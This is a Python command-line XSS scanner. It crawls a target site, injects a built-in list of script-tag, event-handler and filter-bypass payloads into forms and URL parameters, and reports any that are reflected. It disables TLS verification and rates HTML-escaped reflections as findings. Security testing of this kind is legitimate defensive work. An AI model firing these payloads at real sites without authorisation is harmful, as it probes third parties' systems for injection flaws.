#!/usr/bin/env python3
"""
XSS Scanner
Cross-Site Scripting vulnerability scanner.
Parameters:
    - url: Target URL to scan
    - depth: Crawling depth for linked pages
    - payloads: File containing XSS payloads
Requires: requests, beautifulsoup4 packages
"""
import requests
import argparse
import logging
from datetime import datetime
import json
import threading
import queue
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
import re
from concurrent.futures import ThreadPoolExecutor
import html

class XSSScanner:
    def __init__(self, url, depth=1, payloads_file=None, threads=10):
        self.base_url = url
        self.depth = depth
        self.threads = threads
        self.visited_urls = set()
        self.results_queue = queue.Queue()
        self.setup_logging()
        self.setup_session()
        self.load_payloads(payloads_file)

    def setup_logging(self):
        logging.basicConfig(
            level=logging.INFO,
            format='%(asctime)s - %(levelname)s - %(message)s'
        )
        self.logger = logging.getLogger(__name__)

    def setup_session(self):
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 XSSScanner/1.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'DNT': '1'
        })

    def load_payloads(self, payloads_file):
        """Load XSS payloads from file or use defaults"""
        self.payloads = []
        if payloads_file:
            try:
                with open(payloads_file, 'r') as f:
                    self.payloads = [line.strip() for line in f if line.strip()]
            except Exception as e:
                self.logger.error(f"Error loading payloads file: {str(e)}")

        # Add default payloads if none loaded
        if not self.payloads:
            self.payloads = [
                '<script>alert(1)</script>',
                '"><script>alert(1)</script>',
                '\'><script>alert(1)</script>',
                '<img src=x onerror=alert(1)>',
                '"><img src=x onerror=alert(1)>',
                '\'><img src=x onerror=alert(1)>',
                '<svg onload=alert(1)>',
                '"><svg onload=alert(1)>',
                '\'><svg onload=alert(1)>',
                'javascript:alert(1)',
                '<body onload=alert(1)>',
                '"><body onload=alert(1)>',
                '\'><body onload=alert(1)>',
                '<details open ontoggle=alert(1)>',
                '"><details open ontoggle=alert(1)>',
                '\'><details open ontoggle=alert(1)>',
                '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
                '<scr<script>ipt>alert(1)</scr</script>ipt>',
                '";alert(1);//',
                '\';alert(1);//',
                'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
            ]

    def is_same_domain(self, url):
        """Check if URL belongs to the same domain as base_url"""
        return urlparse(url).netloc == urlparse(self.base_url).netloc

    def get_injectable_points(self, url, html_content):
        """Find potentially injectable points in the page"""
        injectable_points = []
        
        # Parse HTML content
        soup = BeautifulSoup(html_content, 'html.parser')
        
        # Find forms
        forms = soup.find_all('form')
        for form in forms:
            form_info = {
                'action': urljoin(url, form.get('action', '')),
                'method': form.get('method', 'get').upper(),
                'inputs': []
            }
            
            # Find input fields
            for input_field in form.find_all(['input', 'textarea']):
                input_type = input_field.get('type', 'text')
                if input_type not in ['submit', 'button', 'image', 'reset', 'file']:
                    form_info['inputs'].append({
                        'name': input_field.get('name', ''),
                        'value': input_field.get('value', '')
                    })
            
            if form_info['inputs']:
                injectable_points.append(('form', form_info))

        # Find URL parameters
        parsed_url = urlparse(url)
        params = parse_qs(parsed_url.query)
        if params:
            injectable_points.append(('url', {
                'url': url,
                'params': params
            }))

        return injectable_points

    def test_payload(self, point_type, point_info, payload):
        """Test XSS payload against an injection point"""
        try:
            if point_type == 'form':
                # Test form inputs
                for input_field in point_info['inputs']:
                    data = {}
                    for field in point_info['inputs']:
                        if field['name'] == input_field['name']:
                            data[field['name']] = payload
                        else:
                            data[field['name']] = field['value']

                    if point_info['method'] == 'GET':
                        response = self.session.get(
                            point_info['action'],
                            params=data,
                            timeout=10,
                            verify=False
                        )
                    else:
                        response = self.session.post(
                            point_info['action'],
                            data=data,
                            timeout=10,
                            verify=False
                        )

                    # Check if payload is reflected
                    if self.check_reflection(payload, response.text):
                        return {
                            'type': 'form',
                            'url': point_info['action'],
                            'method': point_info['method'],
                            'parameter': input_field['name'],
                            'payload': payload,
                            'confidence': self.assess_confidence(
                                payload, response.text
                            )
                        }

            elif point_type == 'url':
                # Test URL parameters
                for param in point_info['params']:
                    params = point_info['params'].copy()
                    params[param] = [payload]
                    test_url = urlparse(point_info['url'])._replace(
                        query=urlencode(params, doseq=True)
                    ).geturl()
                    
                    response = self.session.get(
                        test_url,
                        timeout=10,
                        verify=False
                    )
                    
                    if self.check_reflection(payload, response.text):
                        return {
                            'type': 'url',
                            'url': point_info['url'],
                            'parameter': param,
                            'payload': payload,
                            'confidence': self.assess_confidence(
                                payload, response.text
                            )
                        }

        except Exception as e:
            self.logger.error(
                f"Error testing payload {payload}: {str(e)}"
            )
        
        return None

    def check_reflection(self, payload, response):
        """Check if payload is reflected in the response"""
        # Check for exact payload
        if payload in response:
            return True
            
        # Check for encoded versions
        encoded_payload = html.escape(payload)
        if encoded_payload in response:
            return True
            
        # Check for partial reflections
        payload_without_tags = re.sub(r'<[^>]+>', '', payload)
        if payload_without_tags and payload_without_tags in response:
            return True
            
        return False

    def assess_confidence(self, payload, response):
        """Assess confidence level of XSS vulnerability"""
        confidence = 'Low'
        
        # Check if payload is reflected exactly
        if payload in response:
            confidence = 'High'
        
        # Check if payload is encoded but complete
        elif html.escape(payload) in response:
            confidence = 'Medium'
        
        # Check context of reflection
        soup = BeautifulSoup(response, 'html.parser')
        for script in soup.find_all('script'):
            if payload in script.string:
                confidence = 'High'
                break
                
        for event_attr in ['onload', 'onerror', 'onclick']:
            if f"{event_attr}={payload}" in response:
                confidence = 'High'
                break
        
        return confidence

    def scan_url(self, url, depth=0):
        """Scan a single URL for XSS vulnerabilities"""
        if url in self.visited_urls or depth > self.depth:
            return

        self.visited_urls.add(url)
        self.logger.info(f"Scanning: {url}")
        
        try:
            response = self.session.get(url, timeout=10, verify=False)
            injectable_points = self.get_injectable_points(url, response.text)
            
            # Test each injection point with all payloads
            with ThreadPoolExecutor(max_workers=self.threads) as executor:
                futures = []
                for point_type, point_info in injectable_points:
                    for payload in self.payloads:
                        futures.append(
                            executor.submit(
                                self.test_payload,
                                point_type,
                                point_info,
                                payload
                            )
                        )

                for future in futures:
                    result = future.result()
                    if result:
                        self.results_queue.put(result)

            # Find and scan links if within depth
            if depth < self.depth:
                soup = BeautifulSoup(response.text, 'html.parser')
                for link in soup.find_all('a'):
                    href = link.get('href')
                    if href:
                        absolute_url = urljoin(url, href)
                        if self.is_same_domain(absolute_url):
                            self.scan_url(absolute_url, depth + 1)

        except Exception as e:
            self.logger.error(f"Error scanning {url}: {str(e)}")

    def save_results(self, output_file):
        results = []
        while not self.results_queue.empty():
            results.append(self.results_queue.get())

        scan_results = {
            'timestamp': datetime.now().isoformat(),
            'base_url': self.base_url,
            'depth': self.depth,
            'urls_scanned': len(self.visited_urls),
            'vulnerabilities': results
        }

        try:
            with open(output_file, 'w') as f:
                json.dump(scan_results, f, indent=4)
            self.logger.info(f"Results saved to {output_file}")
        except Exception as e:
            self.logger.error(f"Error saving results: {str(e)}")

    def print_summary(self):
        results = []
        while not self.results_queue.empty():
            results.append(self.results_queue.get())

        self.logger.info("\nScan Summary:")
        self.logger.info(f"URLs scanned: {len(self.visited_urls)}")
        self.logger.info(f"Vulnerabilities found: {len(results)}")
        
        if results:
            self.logger.info("\nVulnerabilities by Confidence:")
            confidence_levels = {'High': 0, 'Medium': 0, 'Low': 0}
            for result in results:
                confidence_levels[result['confidence']] += 1
            
            for level, count in confidence_levels.items():
                if count > 0:
                    self.logger.info(f"{level}: {count}")

            self.logger.info("\nDetailed Findings:")
            for result in results:
                self.logger.info(
                    f"\nURL: {result['url']}\n"
                    f"Type: {result['type']}\n"
                    f"Parameter: {result['parameter']}\n"
                    f"Payload: {result['payload']}\n"
                    f"Confidence: {result['confidence']}"
                )

    def start_scan(self, output_file=None):
        self.logger.info(f"Starting XSS scan of {self.base_url}")
        self.logger.info(f"Crawl depth: {self.depth}")
        self.logger.info(f"Number of payloads: {len(self.payloads)}")
        
        try:
            self.scan_url(self.base_url)
        except KeyboardInterrupt:
            self.logger.info("Scan interrupted by user")
        except Exception as e:
            self.logger.error(f"Error during scan: {str(e)}")
        finally:
            if output_file:
                self.save_results(output_file)
            self.print_summary()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="XSS Scanner")
    parser.add_argument("url", help="Target URL to scan")
    parser.add_argument("--depth", type=int, default=1,
                      help="Crawling depth for linked pages")
    parser.add_argument("--payloads", help="File containing XSS payloads")
    parser.add_argument("--threads", type=int, default=10,
                      help="Number of concurrent threads")
    parser.add_argument("--output", help="Output file for scan results")
    args = parser.parse_args()

    scanner = XSSScanner(args.url, args.depth, args.payloads, args.threads)
    scanner.start_scan(args.output)
